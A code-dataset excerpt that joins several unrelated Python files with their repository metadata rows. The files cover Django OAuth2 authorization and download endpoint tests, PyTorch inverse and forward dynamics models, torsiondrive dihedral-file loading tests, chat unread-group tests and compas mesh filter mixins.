'scope': 'read',
'state': 'an_optional_state',
'allow': 'Authorize',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_fragment_params = self.fragment_params_from_url(resp.url)
self.assertEquals(resp_fragment_params['state'], 'an_optional_state') # Check state is returned and preserved
self.assertEquals('refresh_token' in resp_fragment_params, False) # Check that refresh token is not returned
self.check_redirect_uri_access_token_frag_params(resp_fragment_params) # Check other params
def test_authorization_code_grant_flow(self):
# Redirect to login page when visiting authorize page with an AnonymousUser
client = ApiClient.objects.get(name='ConfidentialAuthorizationCodeClient')
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'code',
})
self.assertIn('/login/', resp.url)
# Redirect includes 'error' param when using non existing response type
self.client.login(username=self.end_user.username, password=self.end_user_password)
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'non_existing_response_type',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_params = self.get_params_from_url(resp.url)
self.check_dict_has_fields(resp_params, ['error'])
self.assertEqual(resp_params['error'], 'unsupported_response_type')
# Redirect includes 'error' param when using non supported response type
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'token',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_params = self.get_params_from_url(resp.url)
self.check_dict_has_fields(resp_params, ['error'])
self.assertEqual(resp_params['error'], 'unauthorized_client')
# Authorization page is displayed with errors with non existing client_id
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': 'thi5i5aninv3nt3dcli3ntid',
'response_type': 'code',
})
self.assertEqual(resp.status_code, 400)
self.assertIn('Invalid client_id parameter value', str(resp.content))
# Authorization page is displayed correctly when correct response_type and client_id
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'code',
})
self.assertEqual(resp.status_code, 200)
self.assertIn('name="allow" value="Authorize"', str(resp.content))
# Redirect includes 'code' and 'state' params
resp = self.client.post(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'code',
'redirect_uri': client.default_redirect_uri,
'scope': 'read',
'state': 'an_optional_state',
'allow': 'Authorize',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_params = self.get_params_from_url(resp.url)
self.assertEquals(resp_params['state'], 'an_optional_state') # Check state is returned and preserved
self.check_dict_has_fields(resp_params, ['code']) # Check code is there
# Return 200 OK 'access_denied' when requesting access token setting client_id and client_secret in body params
code = resp_params['code']
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
'client_secret': client.client_secret,
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': client.default_redirect_uri
})
self.assertEqual(resp.status_code, 200)
self.check_access_token_response_fields(resp)
# Return 'invalid_client' when trying to get access without client_secret
code = resp_params['code']
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
#'client_secret': client.client_secret,
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': client.default_redirect_uri
})
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.json()['error'], 'invalid_client')
modified_rest_framework_settings = settings.REST_FRAMEWORK
modified_rest_framework_settings['DEFAULT_PERMISSION_CLASSES'] = ['rest_framework.permissions.IsAuthenticated']
@override_settings(REST_FRAMEWORK=modified_rest_framework_settings)
class DownloadEndpointsTestCase(TestCase):
def setUp(self):
# Create users
self.dev_user = Account.objects.create_user('dev', password='devpass')
self.end_user_password = 'endpass'
self.end_user = Account.objects.create_user('end', password=self.end_user_password)
# Create clients
ApiClient.objects.create(
name='TestClient',
user=self.dev_user,
agree_tos=True,
client_type=ApiClient.CLIENT_PUBLIC,
authorization_grant_type=ApiClient.GRANT_PASSWORD,
redirect_uris='http://example.com',
password_grant_is_allowed=True,
)
# Create fake download service
from services.acservice.base import BaseACService
from services.acservice.download import ACDownloadMixin
class FakeService(BaseACService, ACDownloadMixin):
NAME = 'DownloadService'
def get_download_url(self, acid):
return 'http://test.url/for/test/{0}'.format(acid)
self.service = FakeService()
self.service.configure({'service_id': 'downloadserviceid', 'enabled': 'yes'})
management.available_services = [self.service]
def test_get_download_link(self):
# Make unauthenticated request and assert it returns 401
resp = self.client.get(reverse('api-download'), {
'acid': 'DownloadService:123',
})
self.assertEqual(resp.status_code, 401)
# Create an access token for application and user
client = ApiClient.objects.get(name='TestClient')
access_token = self.access_token = oauth2_provider.models.AccessToken.objects.create(
token='a_fake_token',
application=client,
user=self.end_user,
expires=datetime.datetime.today() + datetime.timedelta(hours=1)
)
# Make API request authenticated and assert it returns 200
resp = self.client.get(reverse('api-download'), {
'acid': 'DownloadService:123',
}, HTTP_AUTHORIZATION='Bearer {0}'.format(access_token))
self.assertEqual(resp.status_code, 200)
# Ensure request for non existing service returns 404
resp = self.client.get(reverse('api-download'), {
'acid': 'DownloadService2:123',
}, HTTP_AUTHORIZATION='Bearer {0}'.format(access_token))
self.assertEqual(resp.status_code, 404)
# Ensure request with no acid parameter returns 400
resp = self.client.get(reverse('api-download'), {
'acid2': 'DownloadService:123',
}, HTTP_AUTHORIZATION='Bearer {0}'.format(access_token))
self.assertEqual(resp.status_code, 400)
| 42.570439
| 119
| 0.618999
| 1,958
| 18,433
| 5.594995
| 0.117467
| 0.037974
| 0.053765
| 0.036513
| 0.771702
| 0.743496
| 0.737928
| 0.710361
| 0.701689
| 0.692104
| 0
| 0.01254
| 0.277546
| 18,433
| 432
| 120
| 42.668981
| 0.810092
| 0.142842
| 0
| 0.716374
| 0
| 0
| 0.176803
| 0.054914
| 0
| 0
| 0
| 0
| 0.137427
| 1
| 0.035088
| false
| 0.099415
| 0.02924
| 0.002924
| 0.081871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
ea0ca27198361255426d3ae37e032a51153c9bb6
| 6,075
|
py
|
Python
|
behavior_cloning/learner.py
|
chickert/reinforcement_learning
|
473323f08b079004f27a7f0931e5e9a46bfad347
|
[
"MIT"
] | null | null | null |
behavior_cloning/learner.py
|
chickert/reinforcement_learning
|
473323f08b079004f27a7f0931e5e9a46bfad347
|
[
"MIT"
] | null | null | null |
behavior_cloning/learner.py
|
chickert/reinforcement_learning
|
473323f08b079004f27a7f0931e5e9a46bfad347
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as f
from mlp import MultiLayerPerceptron
import torch
import torch.nn as nn
import torch.optim as optim
import logging
import numpy as np
device = "cuda" if torch.cuda.is_available() else "cpu"
logger = logging.getLogger(__name__)
logging.basicConfig()
logger.setLevel(logging.INFO)
class InverseModel(nn.Module):
"""
Inverse model predicts action given the current state and the desired future state
"""
def __init__(self, start_state_dims, next_state_dims, action_dims,
latent_var_1=64, latent_var_2=32, criterion=nn.MSELoss(), lr=4e-4, seed=0):
torch.manual_seed(seed)
super(InverseModel, self).__init__()
self.state_dims = start_state_dims + next_state_dims
self.model = nn.Sequential(
nn.Linear(self.state_dims, latent_var_1),
nn.ReLU(),
nn.Linear(latent_var_1, latent_var_2),
nn.ReLU(),
nn.Linear(latent_var_2, action_dims)
)
self.criterion = criterion
self.optimizer = optim.Adam(self.model.parameters(), lr=lr)
def forward(self, combined_states):
actions = self.model(combined_states)
return actions
def train_and_validate(self, train_dl, valid_dl, num_epochs):
loss_list = []
avg_loss_list = []
valid_loss_list = []
logger.info("Starting with epoch 0")
for epoch in range(num_epochs):
losses_for_given_epoch = []
self.model.train()
for start_states, next_states, true_actions in train_dl:
start_states = start_states.float()
next_states = next_states.float()
true_actions = true_actions.float()
self.optimizer.zero_grad()
combined_states = torch.cat((start_states, next_states), dim=1)
pred_actions = self.model(combined_states)
loss = self.criterion(pred_actions, true_actions)
loss.backward()
self.optimizer.step()
losses_for_given_epoch.append(loss.item())
self.model.eval()
with torch.no_grad():
valid_loss_sum = 0
for start_states, next_states, true_actions in valid_dl:
start_states = start_states.float()
next_states = next_states.float()
true_actions = true_actions.float()
combined_states = torch.cat((start_states, next_states), dim=1)
pred_actions = self.model(combined_states)
valid_loss_sum += self.criterion(pred_actions, true_actions)
valid_loss = valid_loss_sum / len(valid_dl)
loss_list += losses_for_given_epoch
avg_loss_list.append(np.mean(losses_for_given_epoch))
valid_loss_list.append(valid_loss)
logger.info(f'Completed epoch: {epoch}/{num_epochs}')
logger.info(f'Avg loss this epoch: {np.mean(losses_for_given_epoch)}')
logger.info(f'Validation loss this epoch: {valid_loss}')
return loss_list, avg_loss_list, valid_loss_list
class ForwardModel(nn.Module):
"""
Forward model predicts future state given current state and action
"""
def __init__(self, start_state_dims, next_state_dims, action_dims,
latent_var_1=64, latent_var_2=32, criterion=nn.MSELoss(), lr=4e-4, seed=0):
torch.manual_seed(seed)
super(ForwardModel, self).__init__()
self.state_dims = start_state_dims + action_dims
self.model = nn.Sequential(
nn.Linear(self.state_dims, latent_var_1),
nn.ReLU(),
nn.Linear(latent_var_1, latent_var_2),
nn.ReLU(),
nn.Linear(latent_var_2, next_state_dims)
)
self.criterion = criterion
self.optimizer = optim.Adam(self.model.parameters(), lr=lr)
def forward(self, combined_input):
next_states = self.model(combined_input)
return next_states
def train_and_validate(self, train_dl, valid_dl, num_epochs):
loss_list = []
avg_loss_list = []
valid_loss_list = []
logger.info("Starting with epoch 0")
for epoch in range(num_epochs):
losses_for_given_epoch = []
self.model.train()
for start_states, next_states, true_actions in train_dl:
start_states = start_states.float()
next_states = next_states.float()
true_actions = true_actions.float()
self.optimizer.zero_grad()
combined_input = torch.cat((start_states, true_actions), dim=1)
pred_states = self.model(combined_input)
loss = self.criterion(pred_states, next_states)
loss.backward()
self.optimizer.step()
losses_for_given_epoch.append(loss.item())
self.model.eval()
with torch.no_grad():
valid_loss_sum = 0
for start_states, next_states, true_actions in valid_dl:
start_states = start_states.float()
next_states = next_states.float()
true_actions = true_actions.float()
combined_input = torch.cat((start_states, true_actions), dim=1)
pred_states = self.model(combined_input)
valid_loss_sum += self.criterion(pred_states, next_states)
valid_loss = valid_loss_sum / len(valid_dl)
loss_list += losses_for_given_epoch
avg_loss_list.append(np.mean(losses_for_given_epoch))
valid_loss_list.append(valid_loss)
logger.info(f'Completed epoch: {epoch}/{num_epochs}')
logger.info(f'Avg loss this epoch: {np.mean(losses_for_given_epoch)}')
logger.info(f'Validation loss this epoch: {valid_loss}')
return loss_list, avg_loss_list, valid_loss_list
| 37.269939
| 92
| 0.614979
| 749
| 6,075
| 4.663551
| 0.145527
| 0.041225
| 0.054967
| 0.054395
| 0.865445
| 0.848841
| 0.800458
| 0.800458
| 0.780418
| 0.758088
| 0
| 0.007938
| 0.294979
| 6,075
| 163
| 93
| 37.269939
| 0.807611
| 0.024527
| 0
| 0.764228
| 0
| 0
| 0.052748
| 0.011194
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.073171
| 0
| 0.170732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea2c5580621c8f527885096a21fe9aa165b0519f
| 691
|
py
|
Python
|
Jupyter/cntlogs.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Jupyter/cntlogs.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Jupyter/cntlogs.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
# Description: Count number of *.log files in current directory.
# Source: placeHolder
"""
cmd.do('print("Count the number of log image files in current directory.");')
cmd.do('print("Usage: cntlogs");')
cmd.do('myPath = os.getcwd();')
cmd.do('logCounter = len(glob.glob1(myPath,"*.log"));')
cmd.do('print("Number of number of log image files in the current directory: ", logCounter);')
"""
cmd.do('print("Count the number of log image files in current directory.");')
cmd.do('print("Usage: cntlogs");')
cmd.do('myPath = os.getcwd();')
cmd.do('logCounter = len(glob.glob1(myPath,"*.log"));')
cmd.do('print("Number of number of log image files in the current directory: ", logCounter);')
| 40.647059
| 94
| 0.68741
| 103
| 691
| 4.61165
| 0.242718
| 0.105263
| 0.126316
| 0.134737
| 0.858947
| 0.858947
| 0.858947
| 0.858947
| 0.858947
| 0.858947
| 0
| 0.003279
| 0.117221
| 691
| 16
| 95
| 43.1875
| 0.77541
| 0.551375
| 0
| 0
| 0
| 0
| 0.800664
| 0.106312
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.6
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
ea58f6e7def1d143596a49baf4ddf5dcbb67c597
| 176
|
py
|
Python
|
stochastic/processes/__init__.py
|
zaczw/stochastic
|
7de6ec2f9050120adfcffeebc94bfc17ec916150
|
[
"MIT"
] | 268
|
2018-01-17T18:45:20.000Z
|
2022-03-28T06:05:30.000Z
|
stochastic/processes/__init__.py
|
zaczw/stochastic
|
7de6ec2f9050120adfcffeebc94bfc17ec916150
|
[
"MIT"
] | 42
|
2018-07-11T02:17:43.000Z
|
2021-11-27T03:27:32.000Z
|
stochastic/processes/__init__.py
|
zaczw/stochastic
|
7de6ec2f9050120adfcffeebc94bfc17ec916150
|
[
"MIT"
] | 56
|
2018-02-20T09:32:50.000Z
|
2022-02-15T15:39:37.000Z
|
from stochastic.processes.continuous import *
from stochastic.processes.diffusion import *
from stochastic.processes.discrete import *
from stochastic.processes.noise import *
| 35.2
| 45
| 0.840909
| 20
| 176
| 7.4
| 0.4
| 0.378378
| 0.621622
| 0.587838
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 176
| 4
| 46
| 44
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5780e1fd935276aab5a9a1d63b4738644486070d
| 6,402
|
py
|
Python
|
torsiondrive/tests/test_launch.py
|
dotsdl/torsiondrive
|
b6b9530801bdd20f2c8b52051d1ffb1453080e04
|
[
"MIT"
] | 15
|
2018-10-11T13:08:57.000Z
|
2022-03-16T03:25:20.000Z
|
torsiondrive/tests/test_launch.py
|
dotsdl/torsiondrive
|
b6b9530801bdd20f2c8b52051d1ffb1453080e04
|
[
"MIT"
] | 47
|
2018-08-28T06:13:11.000Z
|
2022-01-30T20:35:15.000Z
|
torsiondrive/tests/test_launch.py
|
dotsdl/torsiondrive
|
b6b9530801bdd20f2c8b52051d1ffb1453080e04
|
[
"MIT"
] | 12
|
2019-02-01T23:38:27.000Z
|
2022-03-18T11:54:26.000Z
|
"""
Unit and regression test for the torsiondrive.launch module
"""
import pytest
from torsiondrive.launch import load_dihedralfile, create_engine
def test_load_dihedralfile_basic(tmpdir):
tmpdir.chdir()
fn = 'dihedrals.txt'
# basic test loading one dihedral
dihedral_str = '''
#i j k l
1 2 3 4
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
assert dihedral_idxs == [[0,1,2,3]]
assert dihedral_ranges == []
# basic test loading 2 dihedrals
dihedral_str = '''
#i j k l
1 2 3 4
2 3 4 5
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
assert dihedral_idxs == [[0,1,2,3], [1,2,3,4]]
assert dihedral_ranges == []
# test with wrong number of index
dihedral_str = '''
#i j k l
1 2 3
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
with pytest.raises(ValueError):
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
# test wrong index 0 when default is one-based
dihedral_str = '''
#i j k l
0 1 2 3
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
with pytest.raises(AssertionError):
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
def test_load_dihedralfile_0_1_numbering(tmpdir):
tmpdir.chdir()
fn = 'dihedrals.txt'
# test loading with zero_based_numbering option
dihedral_str = '''
#i j k l
1 2 3 4
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn, zero_based_numbering=True)
assert dihedral_idxs == [[1,2,3,4]]
assert dihedral_ranges == []
# test zero_based_numbering flag in file
dihedral_str = '''
# zero_based_numbering
#i j k l
1 2 3 4
2 3 4 5
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
assert dihedral_idxs == [[1,2,3,4], [2,3,4,5]]
assert dihedral_ranges == []
# test with conflict options
dihedral_str = '''
# zero_based_numbering
# one_based_numbering
#i j k l
1 2 3 4
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
with pytest.raises(ValueError):
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
# test with conflict options
dihedral_str = '''
# one_based_numbering
# zero_based_numbering
#i j k l
1 2 3 4
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
with pytest.raises(ValueError):
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
# test with conflict options
dihedral_str = '''
# one_based_numbering
#i j k l
1 2 3 4
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
with pytest.raises(ValueError):
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn, zero_based_numbering=True)
def test_load_dihedralfile_limited_ranges(tmpdir):
tmpdir.chdir()
fn = 'dihedrals.txt'
# test basic loading with limited dihedral ranges
dihedral_str = '''
#i j k l range_low range_hi
1 2 3 4 -120 120
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
assert dihedral_idxs == [[0,1,2,3]]
assert dihedral_ranges == [[-120, 120]]
# test loading 2 dihedrals with limited dihedral ranges
dihedral_str = '''
#i j k l range_low range_hi
1 2 3 4 -120 120
2 3 4 5 -90 180
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
assert dihedral_idxs == [[0,1,2,3], [1,2,3,4]]
assert dihedral_ranges == [[-120, 120], [-90, 180]]
# test loading dihedrals with split dihedral ranges
dihedral_str = '''
#i j k l range_low range_hi
1 2 3 4 -120 120
2 3 4 5 120 240
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
assert dihedral_idxs == [[0,1,2,3], [1,2,3,4]]
assert dihedral_ranges == [[-120, 120], [120, 240]]
# test loading dihedrals with default ranges
dihedral_str = '''
#i j k l range_lo range_hi
1 2 3 4 -120 120
2 3 4 5
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
assert dihedral_idxs == [[0,1,2,3], [1,2,3,4]]
assert dihedral_ranges == [[-120, 120], [-180, 180]]
# test loading dihedrals with default ranges
dihedral_str = '''
#i j k l range_lo range_hi
1 2 3 4 -120 120
2 3 4 5
3 4 5 6 -90 150
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
assert dihedral_idxs == [[0,1,2,3], [1,2,3,4], [2,3,4,5]]
assert dihedral_ranges == [[-120, 120], [-180, 180], [-90, 150]]
# test loading dihedrals with wrong ranges low>=high
dihedral_str = '''
#i j k l range_lo range_hi
1 2 3 4 -120 120
2 3 4 5 120 120
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
with pytest.raises(AssertionError, match='range'):
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
# test loading dihedrals with wrong ranges low<-180
dihedral_str = '''
#i j k l range_lo range_hi
1 2 3 4 -200 120
2 3 4 5 120 240
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
with pytest.raises(AssertionError, match='range'):
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
# test loading dihedrals with wrong ranges high>360
dihedral_str = '''
#i j k l range_lo range_hi
1 2 3 4 -120 120
2 3 4 5 120 361
'''
with open(fn, 'w') as fp:
fp.write(dihedral_str)
with pytest.raises(AssertionError, match='range'):
dihedral_idxs, dihedral_ranges = load_dihedralfile(fn)
def test_create_engine(tmpdir):
"""Test making an OpenMM engine with native optimizer, expect AssertionError"""
with pytest.raises(AssertionError):
engine = create_engine('openmm', native_opt=True)
| 31.382353
| 89
| 0.615589
| 950
| 6,402
| 3.983158
| 0.094737
| 0.022199
| 0.026163
| 0.023256
| 0.838795
| 0.821353
| 0.800211
| 0.761364
| 0.752907
| 0.733615
| 0
| 0.069277
| 0.273977
| 6,402
| 203
| 90
| 31.536946
| 0.744836
| 0.129491
| 0
| 0.874286
| 0
| 0
| 0.227675
| 0
| 0
| 0
| 0
| 0
| 0.131429
| 1
| 0.022857
| false
| 0
| 0.011429
| 0
| 0.034286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57b5773ef813265c141aa42b7b3dbac7a02b2261
| 2,850
|
py
|
Python
|
test/functional/test_only_unread_groups.py
|
thenetcircle/dino-service
|
90f90e0b21ba920506dc8fc44caf69d5bed9fb6a
|
[
"MIT"
] | null | null | null |
test/functional/test_only_unread_groups.py
|
thenetcircle/dino-service
|
90f90e0b21ba920506dc8fc44caf69d5bed9fb6a
|
[
"MIT"
] | 4
|
2021-05-24T04:31:34.000Z
|
2021-06-28T03:38:56.000Z
|
test/functional/test_only_unread_groups.py
|
thenetcircle/dino-service
|
90f90e0b21ba920506dc8fc44caf69d5bed9fb6a
|
[
"MIT"
] | null | null | null |
from test.base import BaseTest
from test.functional.base_functional import BaseServerRestApi
class TestOnlyUnreadGroups(BaseServerRestApi):
def test_only_unread(self):
self.assert_groups_for_user(0)
self.send_1v1_message(user_id=BaseTest.USER_ID, receiver_id=8888)
self.send_1v1_message(user_id=BaseTest.USER_ID, receiver_id=9999)
self.send_1v1_message(user_id=9999, receiver_id=BaseTest.USER_ID)
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=False, only_unread=False)
self.assertEqual(2, len(groups))
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=False, only_unread=True)
self.assertEqual(1, len(groups))
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=True, only_unread=False)
self.assertEqual(2, len(groups))
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=True, only_unread=True)
self.assertEqual(1, len(groups))
def test_hide_only_unread(self):
self.assert_groups_for_user(0)
group_message = self.send_1v1_message(user_id=BaseTest.USER_ID, receiver_id=8888)
group_id = group_message["group_id"]
self.send_1v1_message(user_id=BaseTest.USER_ID, receiver_id=9999)
self.send_1v1_message(user_id=8888, receiver_id=BaseTest.USER_ID)
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=True, only_unread=True)
self.assertEqual(1, len(groups))
self.update_hide_group_for(group_id, hide=True, user_id=BaseTest.USER_ID)
self.assert_hidden_for_user(True, group_id, user_id=BaseTest.USER_ID)
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=True, only_unread=True)
self.assertEqual(0, len(groups))
self.histories_for(group_id, user_id=BaseTest.USER_ID)
self.assert_hidden_for_user(False, group_id, user_id=BaseTest.USER_ID)
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=True, only_unread=False)
self.assertEqual(2, len(groups))
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=True, only_unread=True)
self.assertEqual(0, len(groups))
self.send_1v1_message(user_id=8888, receiver_id=BaseTest.USER_ID)
self.assert_hidden_for_user(False, group_id, user_id=BaseTest.USER_ID)
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=True, only_unread=True)
self.assertEqual(1, len(groups))
self.update_hide_group_for(group_id, hide=True, user_id=BaseTest.USER_ID)
self.assert_hidden_for_user(True, group_id, user_id=BaseTest.USER_ID)
groups = self.groups_for_user(user_id=BaseTest.USER_ID, count_unread=True, only_unread=True)
self.assertEqual(0, len(groups))
| 46.721311
| 102
| 0.74386
| 430
| 2,850
| 4.57907
| 0.086047
| 0.146267
| 0.170645
| 0.195023
| 0.900965
| 0.900965
| 0.900965
| 0.89741
| 0.887252
| 0.848654
| 0
| 0.022472
| 0.156842
| 2,850
| 60
| 103
| 47.5
| 0.796921
| 0
| 0
| 0.714286
| 0
| 0
| 0.002807
| 0
| 0
| 0
| 0
| 0
| 0.380952
| 1
| 0.047619
| false
| 0
| 0.047619
| 0
| 0.119048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
17cccf2516a78bd09f3d71ef1216c220b07a26af
| 5,792
|
py
|
Python
|
src/compas/datastructures/_mixins/filters.py
|
philianeles/compas
|
129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1
|
[
"MIT"
] | null | null | null |
src/compas/datastructures/_mixins/filters.py
|
philianeles/compas
|
129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1
|
[
"MIT"
] | null | null | null |
src/compas/datastructures/_mixins/filters.py
|
philianeles/compas
|
129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
__all__ = [
'VertexFilter',
'EdgeFilter',
'FaceFilter',
]
class VertexFilter(object):
def vertices_where(self, conditions, data=False):
"""Get vertices for which a certain condition or set of conditions is true.
Parameters
----------
conditions : dict
A set of conditions in the form of key-value pairs.
The keys should be attribute names. The values can be attribute
values or ranges of attribute values in the form of min/max pairs.
data : bool, optional
Yield the vertices and their data attributes.
Default is ``False``.
Yields
------
key: hashable
The next vertex that matches the condition.
2-tuple
The next vertex and its attributes, if ``data=True``.
"""
for key, attr in self.vertices(True):
is_match = True
for name, value in conditions.items():
method = getattr(self, name, None)
if callable(method):
val = method(key)
if isinstance(value, (tuple, list)):
minval, maxval = value
if val < minval or val > maxval:
is_match = False
break
else:
if value != val:
is_match = False
break
else:
if name not in attr:
is_match = False
break
if isinstance(value, (tuple, list)):
minval, maxval = value
if attr[name] < minval or attr[name] > maxval:
is_match = False
break
else:
if value != attr[name]:
is_match = False
break
if is_match:
if data:
yield key, attr
else:
yield key
class EdgeFilter(object):
def edges_where(self, conditions, data=False):
"""Get edges for which a certain condition or set of conditions is true.
Parameters
----------
conditions : dict
A set of conditions in the form of key-value pairs.
The keys should be attribute names. The values can be attribute
values or ranges of attribute values in the form of min/max pairs.
Returns
-------
list
A list of edge keys that satisfy the condition(s).
"""
for u, v, attr in self.edges(True):
is_match = True
for name, value in conditions.items():
method = getattr(self, name, None)
if callable(method):
val = method(u, v)
if isinstance(value, (tuple, list)):
minval, maxval = value
if val < minval or val > maxval:
is_match = False
break
else:
if value != val:
is_match = False
break
else:
if name not in attr:
is_match = False
break
if isinstance(value, (tuple, list)):
minval, maxval = value
if attr[name] < minval or attr[name] > maxval:
is_match = False
break
else:
if value != attr[name]:
is_match = False
break
if is_match:
if data:
yield u, v, attr
else:
yield u, v
class FaceFilter(object):
def faces_where(self, conditions, data=False):
for fkey, attr in self.faces(True):
is_match = True
for name, value in conditions.items():
method = getattr(self, name, None)
if callable(method):
val = method(fkey)
if isinstance(value, (tuple, list)):
minval, maxval = value
if val < minval or val > maxval:
is_match = False
break
else:
if value != val:
is_match = False
break
else:
if name not in attr:
is_match = False
break
if isinstance(value, (tuple, list)):
minval, maxval = value
if attr[name] < minval or attr[name] > maxval:
is_match = False
break
else:
if value != attr[name]:
is_match = False
break
if is_match:
if data:
yield fkey, attr
else:
yield fkey
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
| 29.702564
| 83
| 0.403315
| 514
| 5,792
| 4.447471
| 0.180934
| 0.064304
| 0.07874
| 0.111549
| 0.742345
| 0.730096
| 0.702975
| 0.702975
| 0.702975
| 0.702975
| 0
| 0.000353
| 0.510359
| 5,792
| 194
| 84
| 29.85567
| 0.805712
| 0.189227
| 0
| 0.756522
| 0
| 0
| 0.008963
| 0
| 0
| 0
